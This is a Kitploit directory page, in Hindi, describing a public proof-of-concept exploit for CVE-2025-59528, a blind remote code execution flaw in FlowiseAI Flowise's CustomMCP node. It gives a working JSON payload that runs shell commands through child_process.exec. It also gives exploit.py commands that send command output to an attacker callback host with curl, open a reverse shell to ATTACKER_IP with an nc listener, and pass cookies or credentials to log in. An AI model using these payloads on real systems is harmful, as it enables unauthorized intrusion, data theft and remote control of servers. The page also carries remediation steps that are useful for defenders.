Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - FlowiseAI CustomMCP रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/usifaraby/cve-2025-59528-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - FlowiseAI CustomMCP रिमोट कोड निष्पादन

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59528 - FlowiseAI CustomMCP दूरस्थ कोड निष्पादन

CVSS 10.0 (गंभीर) | ब्लाइंड RCE | FlowiseAI Flowise >= 2.2.7-patch.1 और < 3.0.6

अवलोकन

FlowiseAI Flowise के CustomMCP नोड में एक गंभीर दूरस्थ कोड निष्पादन भेद्यता। convertToValidJSONString फ़ंक्शन mcpServerConfig पैरामीटर से उपयोगकर्ता-आपूर्ति किए गए इनपुट को सीधे JavaScript के Function() कंस्ट्रक्टर में पास करता है, जो कार्यात्मक रूप से eval() के समतुल्य है, जिससे पूर्ण Node.js रनटाइम विशेषाधिकारों के साथ मनमाना JavaScript कोड निष्पादन की अनुमति मिलती है।

  • खोजकर्ता: Kim SooHyun (@im-soohyun)
  • परामर्श: GHSA-3gcm-f6qx-ff7p
  • समाधान: Flowise v3.0.6 (Function() को से बदला गया)
JSON5.parse()

संवेदनशील कोड

packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts में, पंक्तियाँ 262–270:

root@kitploit:~
function convertToValidJSONString(inputString) {
    return Function('return ' + inputString)();  // ← arbitrary code execution
}

टेंट प्रवाह:

root@kitploit:~
HTTP POST → /api/v1/node-load-method/customMCP
  → controller.getSingleNodeAsyncOptions()
    → service layer
      → CustomMCP.listActions()
        → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()

शोषण

यह एक ब्लाइंड RCE है, कमांड आउटपुट HTTP प्रतिक्रिया में प्रतिबिंबित नहीं होता। निष्पादन की पुष्टि के लिए कॉलबैक तकनीकों (curl/wget) या रिवर्स शेल का उपयोग करें।

आवश्यकताएँ

शर्तविवरण
Flowise संस्करण>= 2.2.7-patch.1, < 3.0.6
नेटवर्क पहुंचपोर्ट 3000 पर API एंडपॉइंट (डिफ़ॉल्ट)
प्रमाणीकरण< 3.0.1 के लिए वैकल्पिक, >= 3.0.1 के लिए आवश्यक

पेलोड

root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}

उपयोग

root@kitploit:~
pip install requests

जाँचें कि लक्ष्य संवेदनशील है (समय-आधारित)

root@kitploit:~
python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass

ब्लाइंड कमांड निष्पादन

root@kitploit:~
# Exfiltrate output via callback
python3 exploit.py -t http://target:3000 --mode exec \
  -c "curl http://ATTACKER:PORT/\$(id | base64)" \
  --email [email protected] --password pass

रिवर्स शेल

root@kitploit:~
# Start listener
nc -lvnp 4444

# Fire exploit (auto-tries bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
  --lhost ATTACKER_IP --lport 4444 \
  --email [email protected] --password pass

प्रमाणीकरण विकल्प

root@kitploit:~
# JWT auth (Flowise >= 3.0.1)
--email [email protected] --password pass

# Basic auth (Flowise < 3.0.1 with FLOWISE_USERNAME env)
--username admin --password pass

# Raw cookie string (fallback)
--cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."

सुधार

  • अपग्रेड करें Flowise >= 3.0.6 पर
  • प्रतिबंधित करें फ़ायरवॉल/VPN के माध्यम से API पहुंच
  • सक्षम करें सभी इंस्टेंस पर प्रमाणीकरण
  • निगरानी करें /api/v1/node-load-method/customMCP पर POST अनुरोधों के लिए लॉग

संदर्भ

  • NVD — CVE-2025-59528
  • GitHub Advisory — GHSA-3gcm-f6qx-ff7p
  • SonicWall Threat Analysis
  • Fix Commit — Flowise v3.0.6

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें